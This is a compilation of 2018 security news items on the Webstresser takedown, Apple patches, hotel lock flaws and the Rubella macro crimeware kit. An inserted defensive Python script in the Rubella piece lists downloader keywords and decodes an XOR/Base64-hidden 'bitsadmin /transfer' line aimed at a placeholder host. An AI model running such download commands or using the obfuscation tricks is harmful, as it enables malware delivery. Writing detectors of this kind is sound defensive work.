STE WILLIAMS

Free New Tool for Building Blockchain Skills

Blockchain CTF helps pros build skills with simulations.

Blockchain is understood to be an inherently secure technology, but that doesn’t mean every implementation of blockchain is secure. A new tool, Blockchain CTF, can help train software developers, security professionals, and blockchain experts to design and implement more secure blockchain applications.

Blockchain CTF (which stands for “capture the flag”) is a simulator developed by Security Innovation, a company that provides security training, assessment, and consulting. Blockchain CTF is being released as a free resource for members of the security and blockchain communities.

With Blockchain CTF, participants see a series of vulnerable smart contracts and decentralized apps (DApps) in situations that range from initial coin offerings to open source lotteries. Participants are challenged to find and exploit the vulnerabilities and, in doing so, win points for placement on a leaderboard.

Within the simulations, Security Innovation provides tips and hints aimed at helping participants gain knowledge in developing and testing smart contracts and DApps. The platform is implemented as a client-side DApp on the Ethereum Testnet Blockchain, with states managed by the Ropsten Testnet Blockchain.

For more, see Blockchain CTF here.


Article source: https://www.darkreading.com/cloud/free-new-tool-for-building-blockchain-skills/d/d-id/1331650?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Apple debugs debugger, nukes pesky vulns in iOS, WebKit, macOS

Apple has issued a trio of updates to patch security vulnerabilities in Safari, macOS, and iOS.

For iOS, the update to 11.3.1 addresses a total of four CVE-listed vulnerabilities, including one that is present in the debugging tool used across both iOS and the macOS.

That vulnerability, CVE-2018-4206, was spotted in Crash Reporter by researcher Ian Beer of Google’s Project Zero. According to Apple, a vulnerability in Crash Reporter’s error handling would have allowed an application to trigger a memory corruption error that would have enabled elevation of privilege.

In summary: the debugger had a bug, and a buggy app could have triggered the debugger bug to bugger up everything. To get the patch you’ll want to install iOS 11.3.1 or Security Update 2018-001.


Also patched in iOS was CVE-2018-4187, a UI spoofing vulnerability discovered by Tencent researcher Zhiyang Zeng and Roman Mueller. As explained by Mueller, the vulnerability actually lies in a recently-introduced QR-reading feature Apple added to iOS. Because the camera fails to properly scan and redirect URLs from QR codes, users could be sent to spoof or phishing sites.

Finally, the iOS update addresses two memory corruption flaws in WebKit: CVE-2018-4200, reported by Ivan Fratric of Project Zero, and CVE-2018-4200, found by Richard Zhu of Trend Micro’s Zero Day Initiative. Both would allow a specially-crafted webpage to achieve remote code execution.

Those two WebKit bugs will also be addressed in Safari 11.1, as the Apple web browser shares its engine – and many of the resulting vulnerabilities – with iOS. Users running El Capitan, Sierra, and High Sierra will be getting the Safari update.

Finally, Mac users running High Sierra (macOS 10.13.4) will want to install Security Update 2018-001. That update addresses the macOS occurrences of both CVE-2018-4187 (the QR reader bug), and CVE-2018-4206 (the Crash Reporter vulnerability).

No other security updates were released by Apple, so those running an Apple Watch or AppleTV won’t have to look for patches right now. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/04/25/apple_debugs_debugger_plugs_holes_in_ios_and_webkit/

World’s biggest DDoS-for-hire souk shuttered, masterminds cuffed

Cops yesterday cuffed IT admins behind the “world’s biggest DDoS marketplace”, webstresser.org, Europol confirmed today.

Europol said Webstresser.org had 136,000 registered users and four million attacks measured by April 2018, targeting online services from banks, government institutions, police forces and the gaming world.

Operation Power Off, as the investigation was code-named, was led by Dutch police and Britain’s National Crime Agency with support from a dozen law enforcement agencies around the world, including Europol’s Cybercrime Centre.

“Stressed websites make powerful weapons in the hands of cybercriminals,” said Jaap van Oss, Dutch chairman of the Joint Cybercrime Action Taskforce.

“International law enforcement will not tolerate these illegal services and will continue to pursue its admins and users,” he added.

The administrators were based in multiple locations including the UK, Croatia, Canada and Serbia. The service was shuttered yesterday and the infrastructure seized.

Unspecified “further measures” were also taken against the top users in the above four countries, as well as in Italy, Australia, Hong Kong and Spain.

Any registered user on Webstresser.org could cough up a nominal fee, some as low as €15 per month – paid for with cryptocurrencies or online payments services – to rent the use of stressors and booters.

This meant those without deep tech skills could simply hire a DDoS attack, said Steve Wilson, head of Europol’s Cybercrime Centre.

“We have a trend where the sophistication of certain professional hackers to provide resources is allowing individuals – and not just experienced ones – to conduct DDoS attacks and other kind of malicious activities online.”

The biggest DDoS incident occurred earlier this year when code repository GitHub was taken down in a 1.3Tbps attack. This record was broken days later by a 1.7Tbps assault on a US service provider, as made public by Arbor Networks. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/04/25/worlds_biggest_ddosforhire_site_shuttered_admins_cuffed/

Hotel, motel, Holiday Inn? Doesn’t matter – they may need to update their room key software

Infosec outfit F-Secure has uncovered security vulnerabilities in a hotel keycard system that can be exploited by miscreants to break into rooms across the globe.

Exploitable flaws were discovered in the lock system software, Vision by VingCard, which F-Secure said is used to secure millions of hotel rooms worldwide.

Their findings prompted the world’s largest lock manufacturer, Assa Abloy, to issue software updates with security fixes to mitigate the issue.

Any ordinary wireless electronic keycard can be turned into a skeleton key – even ones long expired, discarded, or used to access spaces other than hotels, such as a garage or closet. The team was able to create a master key with privileges to open any room in the building without being noticed.

“You can imagine what a malicious person could do with the power to enter any hotel room, with a master key created basically out of thin air,” said Tomi Tuominen, practice leader at F-Secure. “We don’t know of anyone else performing this particular attack in the wild right now.”

However, Tuominen admitted the hack took years to complete – meaning it is unlikely that crims would go to those lengths rather than, say, kicking in the door.

Christophe Sut, executive veep at Assa, described the findings as “remarkable.”

He said: “What they achieved involved quite an effort. It was valuable and helped us move things to the next level of security. When we got the findings, we worked closely with them to upgrade our security.”

He reckoned only a small proportion of all rooms globally could be targeted via the flaw, adding: “We are working with hotel chains to let them know about the findings so they can implement security updates.”

The biz said it was not aware of any rooms being broken into using the flaws uncovered by F-Secure.

Experts keep schtum

The details of the methods and the tools will not be made public by F-Secure. Assa added that the vulnerability only applies to its Vision software, a platform it no longer develops.

The researchers’ interest in hacking hotel locks was sparked a decade ago when a colleague’s laptop was stolen from a hotel room during a security conference.

When the theft was reported, hotel staff dismissed their complaint given that there was not a single sign of forced entry, and no evidence of unauthorized access in the room entry logs.

They then decided to investigate the issue further, and chose to target a brand of lock known for quality and security. Their probing of the technology took several thousand hours on an on-and-off basis, and involved considerable trial and error.

“We wanted to find out if it’s possible to bypass the electronic lock without leaving a trace,” said Hirvonen, senior security consultant at F-Secure.

“Building a secure access control system is very difficult because there are so many things you need to get right. Only after we thoroughly understood how it was designed were we able to identify seemingly innocuous shortcomings. We creatively combined these shortcomings to come up with a method for creating master keys.”

F-Secure has worked with Assa over the past year to implement software fixes, and updates have been made available to affected properties. It has not charged the company for its services. ®

Bootnote

Didn’t get the headline? It’s courtesy of Mr Worldwide himself, Pitbull. Dale!


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/04/25/hotel_room_key_security_flaw/

Cloud Misconceptions Are Pervasive Across Enterprises


Shadow IT is rampant at many organizations that rely upon cloud-delivered tools and services to enable remote work, according to a new study. Here’s what security teams need to do about it.

Everyone understands the benefits of the cloud, and the recent iboss 2018 Enterprise Cloud Trends Report shows adoption is increasing, with IT decision makers (ITDMs) planning to increase their SaaS spend from 21% of the overall IT budget to 28% over the next year. Despite this vote of confidence in the cloud from IT, the findings indicate that there is still a fundamental misunderstanding about the cloud that’s creating a disconnect – and misplaced concerns – among office workers and ITDMs.

While virtually all the ITDMs surveyed (99%) say that there is at least one positive driver motivating them to explore more cloud-based solutions, they still by-and-large acknowledge that their organization’s security policies need to improve to operate fully in a cloud environment (91%). This reservation hasn’t slowed down the use of SaaS and cloud products across the enterprise; every office worker polled views cloud and SaaS favorably, often bringing these applications into the network workflow with or without the approval of IT.

In fact, the survey shows that Shadow IT is rampant at most organizations, especially those that rely upon cloud-delivered tools and services to enable remote work. As many as 82% of the office worker respondent group admits to accessing SaaS applications when working remotely without using their company’s VPN, in violation of an acknowledged remote work policy. Those who have circumvented their company’s VPN do so to bypass restrictions enforced by IT, or because the security functions of the VPN cause latency issues that inhibit work.

Almost three quarters (72%) of surveyed office workers agree that it is more important for them to get access to the cloud and SaaS applications they need to do their job effectively than to tell the IT department what applications they are using. This is creating an environment where the security teams that are tasked with protecting network resources could be blind to glaring vulnerabilities because of inappropriate worker activity.

The challenge of overcoming this disconnect begins with every stakeholder – from office workers to ITDMs – gaining a more complete understanding of what the cloud means and how SaaS tools are delivered. Many of the top concerns that ITDMs hold about cloud – despite their inability to throttle the rate of SaaS adoption to meet business goals – are misguided, as these teams are only considering old-school cloud architectures that feature built-in security flaws.

The truth is, there are a multitude of ways that cloud-based services can be delivered to businesses without putting the organization at greater risk for data theft.

For starters, companies should investigate cloud tools that leverage “dedicated” cloud environments, as opposed to the multi-tenant, shared-cloud settings that pool customer data and cloud capacity among users. This will alleviate fears regarding data privacy (top concern for 62% of ITDMs) by ensuring that content is never mixed in that cloud setting so long as office workers continue to use approved, single-tenant cloud products.

There also need to be fewer workarounds for employees looking to bypass network security protocols such as VPNs for remote work. By leveraging cloud-based security or web gateway products, for instance, teams can retire VPNs altogether and redirect remote traffic to gateways in-the-cloud rather than backhaul connections. This will simplify network security architectures, retire the need for backhaul networks, and limit the opportunities for remote workers to inadvertently compromise network security.

Paul Martini is the CEO, co-founder and chief architect of iboss, where he pioneered the award-winning iboss Distributed Gateway Platform, a web gateway as a service. Paul has been recognized for his leadership and innovation, receiving the Ernst & Young Entrepreneur of The …

Article source: https://www.darkreading.com/partner-perspectives/iboss/cloud-misconceptions-are-pervasive-across-enterprises/a/d-id/1331632?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Diversity: It’s About Inclusion

Unrealistic entry-level job requirements, black-hoodie hacker image problems are among the ‘uncomfortable conversations’ needed to remedy cybersecurity’s diversity gap.

Something shifted last week in the cybersecurity diversity gap conversation.

A rare representation of several speakers of color, gender, and various cultures took the stage in San Francisco both at the RSA Conference and related events. They shared not only their security and privacy expertise, insight, and research – but also their firsthand experiences as minorities and their recommendations for creating a more diverse and inclusive industry.

The glaring lack of diversity in the industry’s workforce is well-documented: women make up just 11% of the industry, while Hispanic and African-Americans overall comprise 12%. But the numbers have mostly remained static, despite an increasingly diverse US and global population. 

Backlash a few weeks ago over a relative lack of women represented in the RSA Conference’s initial slate of keynote speakers led renowned executives from Facebook, Google, and members of other tech firms to organize a rival one-day conference called Our Security Advocates (OURSA). The April 17 event featured talks by security and privacy experts from underrepresented backgrounds and sectors of society.

Just across the street, the day before, the RSA Conference held its own event called Securing Diversity, with a lineup of women and minority speakers in the industry discussing how to hack the security diversity gap. The RSA Conference keynote slate the following day featured a Q&A with US Department of Homeland Security Secretary Kirstjen Nielsen, in addition to several women speakers in the session tracks.

But it was the combination of mounting frustration over the industry’s seeming inability to recruit and retain a more diverse workforce and the OURSA conference’s protest that ultimately made diversity one of the key industry themes during the industry’s largest annual conference week.

“It’s more important than ever that security and privacy platforms are built to reflect the diversity of our users, employees, and administrators of the world,” Parisa Tabriz, Google’s director of engineering, told attendees at OURSA.

Minorities and women in the industry often find they are constantly battling for equal treatment. “We’ve got a ways to go here, for women and people who look like me. We have to work twice as hard to make ourselves credible and to be heard,” Devon Bryan, founder and president of the International Consortium of Minority Cybersecurity Professionals (ICMCP), said at an event sponsored by the Cybersecurity Diversity Foundation.

Bryan, who is also executive vice president and CISO of the Federal Reserve System, points out that minorities don’t want to be hired just because they are minorities. “They don’t want to be hired because of what they look like, they want to be hired because they are good at what they do. They want to be valued and contributing,” he said. “Diversity is not about the numbers.”

Diversity isn’t just about the cybersecurity talent gap, either, according to Kim Jones, director of the Cybersecurity Education Consortium at Arizona State University and a former CISO and intelligence professional. Jones, who spoke at RSA Conference’s Securing Diversity summit, argues that getting serious about fostering a more diverse industry requires looking at things differently.

“We need to separate diversity from the talent gap issue. Before there was a talent shortage, there was a diversity problem,” Jones said, noting that security itself doesn’t care about race, creed, color, or sexual orientation, so there shouldn’t be a diversity gap.

“For some reason, we are not attracting or resonating or giving an opportunity” for minorities to work in the industry, he said. Some of that is the image cybersecurity often projects, with black hoodies or “bad boy” attitudes that don’t resonate among underrepresented groups: “That’s not the way to recruit,” he said. “When I talk to students, I say if you want to be someone who helps defend people … and make a difference,” come work with me.

Minorities and women already in the industry also need to step up and serve as role models. “If you don’t have a role model, be one. I’ve been the sole African-American executive” of companies before, he said. “Being the ‘only one’ is hard, but equip the people behind you.”

It’s not just about hiring: it’s about the inclusion of those diverse employees, said Mischel Kwon, founder and CEO of MKACyber and creator of the Cybersecurity Diversity Foundation. That means ensuring minorities and women get their voices and input heard at work and in meetings; and it can take time to hack through implicit biases that prevent that. “You have to have the uncomfortable conversations,” Kwon told Dark Reading in an interview.

Corporate diversity initiatives also require a little soul-searching. “My question is how serious are you? Are you doing something just to make the numbers get better or [because] it feels good to say you’re talking about” diversity, Jones said. “Or are you truly and honestly making a difference not because the numbers say we need to, but because it’s the right thing to do.”

United on Diversity

Christine Izuakor, senior manager of global security strategy and awareness at United Airlines, said the airline has a diverse cybersecurity team made up of 40% women and various ethnicities and sexual orientation. “For that we are a much stronger team,” she said. “But it’s not about color or gender. It’s the unique perspective each brings.”

She said United’s diverse security team grew organically. “I don’t know if it was intentional” originally to build such a diverse team, she told Dark Reading in an interview. “There’s a more deliberate focus on that today.”

Among United’s initiatives to foster diversity are its cybersecurity rotation program, which includes providing internships to students in underrepresented communities. “We need to ignite that spark to [attract] people in all walks of life,” she said.

Recruiting a more diverse team also means busting a few myths that hold back the industry from attracting a wider range of people, including making technology solutions that are inclusive by design so that people from all backgrounds get access to the same opportunities in the field, and help remove any barriers to them. “I’m a first generation Nigerian in America, and my culture didn’t support” an IT security field, she said. “I was raised to believe that success is a doctor or an engineer, and nothing in between.”

Izuakor said the “spark” that drew her to cybersecurity wasn’t a role model – there weren’t any for her at the time – but an elective cybersecurity course she took in college.

She believes companies should scrap the minimum degree and experience requirements for new job candidates. “Being an expert is absolutely important, but it’s not years of experience alone that determine the value of contributions,” she said. “We need to focus more on creating opportunities for entry” level applicants, and provide them a career “line of sight,” she said.

The Year Up organization, for example, trains young urban adults for six months and then offers a six-month internship with participating organizations as a career path. “Fresh perspective works wonders,” she said. “It takes that cross-generational knowledge and sharing and collaboration.”

Coding and technical experience aren’t the only skills needed in cybersecurity jobs, according to Izuakor, noting that the image of a coding expert wearing a black hoodie presents an image problem. “Our industry needs an extreme makeover,” she said. “Our images are one of the greatest barriers to the industry, especially for minorities … We need to make sure we are positioning ourselves more inclusively.”

Meantime, several speakers in the diversity sessions acknowledged that they were mostly preaching to the choir. “People who need to hear this are not here. That’s the biggest problem,” Jones said. “You need to bring conversations like this to the main hall [of RSAC] and make people a little uncomfortable to hear about it.”


Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …

Article source: https://www.darkreading.com/vulnerabilities---threats/diversity-its-about-inclusion/d/d-id/1331637?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Low-Cost Crimeware Kit Gaining Popularity in Underground Markets

At $150 for a three-month subscription, Rubella Macro Builder presents a threat to enterprises, Flashpoint says.

When it comes to malware and cybercriminals, sometimes “cheap” and “fast” clearly trumps “tested” and “sophisticated.”

That’s the case with Rubella Macro Builder, a recently discovered crimeware kit that, despite being new and relatively unsophisticated, has been gaining popularity among cybercriminals – including members of the suspected Russian gang behind the Panda banking malware.

Security vendor Flashpoint, which issued an advisory on the threat this week, described Rubella as enabling criminals to generate Microsoft Word (.doc) and Microsoft Excel (.xls) payloads. “The Rubella-generated malware acts as a first-stage loader for other subsequent malware downloads and installations on targeted machines,” says Vitali Kremez, director of research for Flashpoint.

Since it surfaced in February, Rubella Macro Builder has been used as a first-stage loader in one of the most recent Panda campaigns. The group behind the distribution appears to have targeted victims through various social media platforms and through webinjects, Flashpoint says.

“Flashpoint identified Rubella malware infection leading to the execution of the Panda banking malware version 2.6.6 and Gootkit banking malware,” Kremez says. Panda and Gootkit are designed to harvest credentials, infect browsers through webinjects and enable remote PC access via a hidden virtual network-computing module, he says.

When it first surfaced in February, the authors of the Rubella crimeware kit priced it at a relatively low $500 per month. Since then, prices for the kit have dropped even further to just around $150 for a three-month subscription even as it has acquired several new capabilities, according to Flashpoint.

The Rubella crimeware kit currently includes support for XOR and Base64 encryption algorithms; PowerShell, Microsoft.XMLHTTP, and Bitsadmin download methods; and multiple payload execution options, including Visual Basic Script and JavaScript.

Rubella Macro Builder does not exploit any security vulnerabilities. Rather, it relies on social engineering techniques to force victims to enable malicious macro execution to run it, Kremez says. It is typically distributed to intended victims via Microsoft Word or Excel email attachments during spam campaigns. It comes with some rudimentary but nevertheless effective obfuscation methods for bypassing basic AV tools.

“The macro builder has a clear appeal for cybercriminals: it’s cheap, fast, and can defeat basic static anti-virus detection,” Kremez says.

Rubella is somewhat similar to ThreadKit, a more advanced malware kit that researchers at Proofpoint discovered last October and described in an alert in March. ThreadKit, like Rubella, is a Microsoft Office document exploit builder, but packs more features, including a mechanism for reporting infection statistics back to the operators of the malware.

ThreadKit has been used quite extensively to spread numerous malware payloads including Trickbot and remote access Trojans like Loki Bot and FormBook. One well-known crime group that has been using the kit is the Cobalt Gang, a threat actor associated with various ATM heists.

“Microsoft Office macro-based malware appears to still be threat actors’ preferred method for obtaining initial access to compromised machines,” Flashpoint said in its advisory. Microsoft Office-based loader malware like Rubella works well as an initial decoy because it looks like commonly exchanged Word and Excel documents and attachments.

According to the security vendor, Rubella Macro Builder represents a moderate threat for enterprises given its ability to beat static AV tools and its low pricing model. To mitigate their exposure to the threat, organizations should pay attention to email messages with suspicious Word or Excel attachments, especially those that ask permission to ‘Enable Content’ for running macros, Flashpoint said.
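A triage sketch for that advice, as an added example that is not from Flashpoint or the article: it scans already-extracted macro source for the download methods named above, both in plain text and hidden behind hex or Base64 literals with an optional XOR layer. The single-byte XOR key, the literal formats, the function names and both sample macros are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Entry points Office runs automatically when a document or workbook opens.
AUTO_EXEC = ("autoopen", "auto_open", "document_open", "workbook_open")
# Download methods the article lists for the kit.
DOWNLOADERS = ("powershell", "microsoft.xmlhttp", "bitsadmin")

STRING_LITERAL = re.compile(r'"([^"\r\n]{8,})"')
HEX_BODY = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")
BASE64_BODY = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def hits(text, words):
    """Return the indicator words present in text, case-insensitively."""
    low = text.lower()
    return [w for w in words if w in low]


def unwrap(literal):
    """Decode a hex or Base64 string literal; return (wrapper, bytes) or None."""
    if HEX_BODY.match(literal):
        return "hex", bytes.fromhex(literal)
    if len(literal) % 4 == 0 and BASE64_BODY.match(literal):
        try:
            return "base64", base64.b64decode(literal, validate=True)
        except (binascii.Error, ValueError):
            return None
    return None


def reveal(literal):
    """Try key 0 (no XOR), then every single-byte XOR key (an assumption about
    the key length). Report the first decoding that is printable ASCII and
    names a download method, which keeps random matches out of the report."""
    unwrapped = unwrap(literal)
    if unwrapped is None:
        return None
    wrapper, raw = unwrapped
    for key in range(256):
        cand = bytes(b ^ key for b in raw)
        if not all(32 <= b < 127 for b in cand):
            continue
        found = hits(cand.decode("ascii"), DOWNLOADERS)
        if found:
            layer = wrapper if key == 0 else f"{wrapper}+xor(0x{key:02x})"
            return layer, found
    return None


def triage_macro(source):
    """Score extracted macro source: auto-run entry point plus a download
    method (plain or hidden) is the combination worth escalating."""
    report = {
        "auto_exec": hits(source, AUTO_EXEC),
        "plain": hits(source, DOWNLOADERS),
        "hidden": [],
    }
    for literal in STRING_LITERAL.findall(source):
        result = reveal(literal)
        if result:
            layer, found = result
            report["hidden"] += [(layer, word) for word in found]
    has_download = bool(report["plain"] or report["hidden"])
    if report["auto_exec"] and has_download:
        report["verdict"] = "suspicious"
    elif report["auto_exec"] or has_download:
        report["verdict"] = "review"
    else:
        report["verdict"] = "no-indicators"
    return report


def constructed_sample():
    """Constructed, inert macro text: two encoded strings and no logic."""
    first = base64.b64encode(b"bitsadmin /transfer job http://example.invalid/placeholder")
    second = bytes(b ^ 0x5A for b in b"powershell -nop (placeholder)").hex()
    return f'Sub AutoOpen()\n    a = "{first.decode()}"\n    b = "{second}"\nEnd Sub'


def constructed_benign():
    """Constructed ordinary macro with a long but harmless string literal."""
    return 'Sub FormatTotals()\n    title = "Quarterly totals by region"\n    Range("A1").Value = title\nEnd Sub'


if __name__ == "__main__":
    for name, text in (("sample", constructed_sample()), ("benign", constructed_benign())):
        print(name, triage_macro(text))
```

A keyword scan of the raw text alone returns nothing for the first sample, which is the gap basic static checks leave; decoding the literals before matching closes it.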


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/vulnerabilities---threats/low-cost-crimeware-kit-gaining-popularity-in-underground-markets/d/d-id/1331638?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Why Information Integrity Attacks Pose New Security Challenges

To fight information integrity attacks like the ones recently perpetrated by bots on the FCC’s website, we need to change our stance and look for the adversaries hiding in plain sight.

In December 2017, people looking through the Federal Communications Commission’s net neutrality comment form witnessed a miracle — the dead returning to life.

Or that’s how it looked, anyway. In reality, cybercriminals used a botnet to post what an analysis by the New York State Justice Department estimated to be over 2 million identical comments under the names and street addresses of real people. In a strange twist, frustrated users quickly took to Twitter to report that some of these names belonged to their deceased family members and friends.

Though this instance of fraud may seem like a one-off, I believe we’re only seeing the beginning of this kind of threat. We’re likely to see more and more efforts to obscure or influence public opinion like this in the near future, and it will become more difficult to separate the bots from real users.


A Threat to Us All
In this instance, cybercriminals are using a tactic called skewing — deploying huge botnets to flood a comments section — to, well, “skew” public opinion. The bot comments not only drowned out real users but could also have shifted the sentiment of the public conversation about net neutrality. Though the FCC says it didn’t pay much attention to the comments, the implications of the attack are more pressing than the attack itself. Identity fraud was used to influence a vote in Congress that would determine the fate of one of the most important Internet laws in our society — who knows what else these botnets could be used for?

It used to be that bots were easy to detect and stop because they behaved in ways that clearly broke the rules set by websites for users. In many cases, bots would try to inject code on the website they were invading, an action that is clearly not allowed and therefore subjects the account to banning or suspension by moderators.

The tricky thing about today’s bots is that, on paper, they follow all the rules. They can register a real email address to create an account, confirm a password, and even pass CAPTCHA tests to “prove” that they’re human users at a 70% success rate. At White Ops, we see that 75% of malicious bots are actually operating off of real humans’ machines. They hide in the background, mimic behaviors and browsing times, and use their hosts’ cookies and browsing history. That makes it an awful lot harder to identify bots, block them, and prevent them from tipping the scales of public opinion.

The only reason the fraudulent FCC comments were detected in the first place was because the botnet’s operators made the mistake of impersonating deceased human users. On the whole, the botnet appears to have been fairly rudimentary, not very likely the work of sophisticated cybercriminals. Otherwise, this threat may have gone completely undetected among the form letters and authentic traffic, which raises a frightening question: how many of these attacks have already happened right under our noses?

While the damage done by cybercrimes, such as breaking into and stealing from someone’s online bank account, can be disastrous, the implications of this kind of “zombie” network go far deeper. Cybercriminals most likely utilized similar botnets on both sides of the 2016 presidential election, and their effect on its results is ultimately impossible to quantify.

If left unchecked, these bots will steadily erode human users’ trust in anything they see on the Web. Given how easy it is to impersonate human behaviors, how popular will the most popular stories in your feed be, really? Does the song that’s topping the charts of your favorite streaming service or the latest viral video really have that many plays? Is the metric that’s guiding your company’s decisions based in anything real or the work of some unseen manipulator hiding in the shadows?

Make no mistake — the stakes here are high. In many ways, the Internet is ruled by algorithms and machine learning that curate what makes it to the top of the charts on a minute-by-minute basis. The ability to manipulate those rankings can have real value. It’s gaining that kind of visibility that fuels the multibillion dollar advertising industry that we know today.

In the near future, wars over public opinion could be determined by who has the most convincing bots, not the most convincing argument.

Stemming the Tide of Bot Traffic
The fraud campaign to take down net neutrality seems to be the work of amateurs, yet it still very well could have influenced a major congressional vote. Cybercriminals are installing malware on our computers and using them to do practically anything they want. We don’t necessarily know what else hackers have accomplished using our names and addresses.

There’s always a way to identify and stop new automated threats, no matter how large and untraceable they may seem. But it can’t happen until cybersecurity professionals everywhere recognize the potential severity of this problem, not just for specific entities on the Internet, but for our ability to trust anything that we find online.

Some commentators have said the end of net neutrality heralds the death of the Internet — but ironically enough, it may be the wake-up call that inspires us to save it.


Prior to co-founding White Ops, Tamer Hassan was the founder and CEO of Compel Data Technologies Inc., a software development and consulting company focused on big data and business intelligence solutions. In the years prior to entering the technology sector, Tamer was a …

Article source: https://www.darkreading.com/vulnerabilities---threats/why-information-integrity-attacks-pose-new-security-challenges/a/d-id/1331562?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

‘Webstresser’ DDoS Attack Site Shut Down in International Operation

Investigators arrested the admins of Webstresser, the world’s largest DDoS marketplace reportedly responsible for more than four million attacks.

The world’s largest online marketplace for selling and launching distributed denial-of-service (DDoS) attacks was shut down this week as part of Operation Power Off, an international investigation into the so-called Webstresser.org site. The effort was led by the UK National Crime Agency (NCA) and Dutch National Police, with support from Europol and a dozen global law enforcement agencies, Europol reports.

Webstresser had more than 136,000 registered users, and threat actors have reportedly used it to launch at least four million cyberattacks, targeting government agencies, banks, police organizations, and victims in the gaming sector by flooding their servers with traffic, according to Europol.

The site simplified the process of launching DDoS attacks, once a threat mostly accessible to tech-savvy cybercriminals. Anybody, regardless of their technical skill level, could use Webstresser’s online payment system or cryptocurrency to rent out stressers or booters, which were available for as little as 15 EUR/month and could be used for destructive DDoS attacks.

Stressers and booters are for-hire services that grant access to DDoS botnets. Most aim to make money under the pretense of offering a legitimate, useful service to test servers’ resiliency. In reality, they usually don’t require proof of identity from the individual launching the attack, nor do they ask whether the attacker is associated with the organization being targeted.

“As this event illustrates, it remains ridiculously cheap to rent a devastating DDoS attack from these so-called DDoS ‘stressers’ or on the Dark Web,” says Andrew Lloyd, president of Corero Network Security. “In many territories, it also remains a criminal offence.”

Authorities in five countries, including Canada, Croatia, Serbia, and the Netherlands, along with support from Europol and Police Scotland, arrested six suspected members of the group behind Webstresser on April 24. Dutch Police, with support from Germany and the US, seized servers and started the takedown of the site on the morning of April 25.

Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT) provided support for the investigation by enabling an information exchange among all participating organizations. On the day of the takedown, a command and coordination post was set up at Europol HQ. Europol reports measures were also taken against Webstresser’s top users in the Netherlands, Italy, Spain, Croatia, the UK, Australia, Canada, and Hong Kong.

NCA officials believe an attacker linked to an address in Bradford, UK, used Webstresser to target seven of the UK’s largest banks in November 2017. The banks were forced to scale back their operations and, in some cases, shut down entire systems, costing hundreds of thousands of pounds in recovery. The address was identified and searched as part of this effort.

John Fokker, McAfee’s head of cyber investigations, notes how Webstresser points to the overall rise of attacks on the gaming sector, which is increasingly targeted as attacks become easier to launch. He also suggests a threat like this could have geopolitical implications.

“Attacks on gaming servers predominately committed by young people are becoming increasingly popular and the relative ease with which these attacks are carried out by individuals with little hacking experience is striking,” he says. “Webstresser and other similar attacks suggest entire organizations or parts of a country can be disrupted for the price of a pound of good coffee beans.”

Jo Goodall, senior investigating officer at the NCA, urged businesses and individuals to report cybercrime. In a statement, she points to the Action Fraud website, the UK’s national fraud and cybercrime reporting center. Guidance on how to mitigate the effects of cyberattacks can be found at the National Cyber Security Centre website.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/vulnerabilities---threats/webstresser-ddos-attack-site-shut-down-in-international-operation/d/d-id/1331642?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Despite Risks, Nearly Half of IT Execs Don’t Rethink Cybersecurity after an Attack

A recent survey reveals a troubling degree of security inertia lurking among scores of organizations. But there are a few bright spots.

A wise person once said, “Insanity is doing the same thing over and over again and expecting different results.” However, in a recent survey done by CyberArk for its Global Advanced Threat Landscape Report 2018 (registration required), almost half (46%) of 1,300 IT executives in seven countries say they rarely change their security strategy — even after a cyberattack.

The survey findings suggest that a troubling degree of security inertia lurks within scores of organizations and effectively renders them unable to repel or contain cyber threats. Such complacency puts sensitive corporate data, IT infrastructure, and assets at risk. In fact, an overwhelming 46% of respondents say their organization can’t stop the bad guys from infiltrating internal networks each time they try. More than a third (36%) say that their company’s administrative credentials are stored on personal computers in Word or Excel documents. Further, half (50%) of the respondents admit that their customers’ privacy or personally identifiable information could be at risk because their data is not secured beyond the legal minimums.

Flexibility Overrides Security
Whether organizations use cloud computing, build large-scale data silos, or connect thousands of IoT devices, going digital inevitably means facing a whole range of new cyber threats — with safeguarding privileged accounts being the starting point, according to the study. Most IT security pros say that protecting an IT environment starts with safeguarding privileged accounts. Nine out of 10 (89%) of experts surveyed say IT infrastructure and critical data are not fully protected unless privileged accounts, credentials, and secrets are under digital lock and key. Regarding cybersecurity threats, respondents worry most about targeted phishing attacks (56%), insider threats (51%), ransomware or malware (48%), unsecured privileged accounts (42%), and unsecured data stored in the cloud (41%).

IT security respondents also say the proportion of users with local administrative privileges on their devices increased from 62% in 2016 to 87% in 2018 — a 25% jump. This seems to indicate that employee demands for flexibility are overriding best data-protection practices.

The automation that is part and parcel of the cloud and DevOps means privileged accounts, credentials, and secrets are being created at breakneck speed. If breached, these provide attackers with an ideal platform from which they can gain access to sensitive data across networks, data and applications, or cloud infrastructure they can use for illicit cryptomining activities. More organizations are acknowledging this security risk but nevertheless adopt a lax approach to cloud security.

When it comes to the cloud, 49% of organizations surveyed have no privileged account security strategy. More than two-thirds (68%) shift the responsibility for cloud security to the vendor and the built-in security features of its cloud solution. Another 38% say their cloud provider doesn’t provide adequate protection.

Reforming Security Culture
Security is often misperceived as a cost factor or necessary evil rather than a differentiating factor or competitive advantage. Consequently, banishing cybersecurity inertia will involve making it key to organizational strategy and behavior. To that end, most respondents to the survey (86%) say security should be a routine board-level discussion item, which suggests that currently there is a potentially disastrous disconnect between cybersecurity and the C-suite.

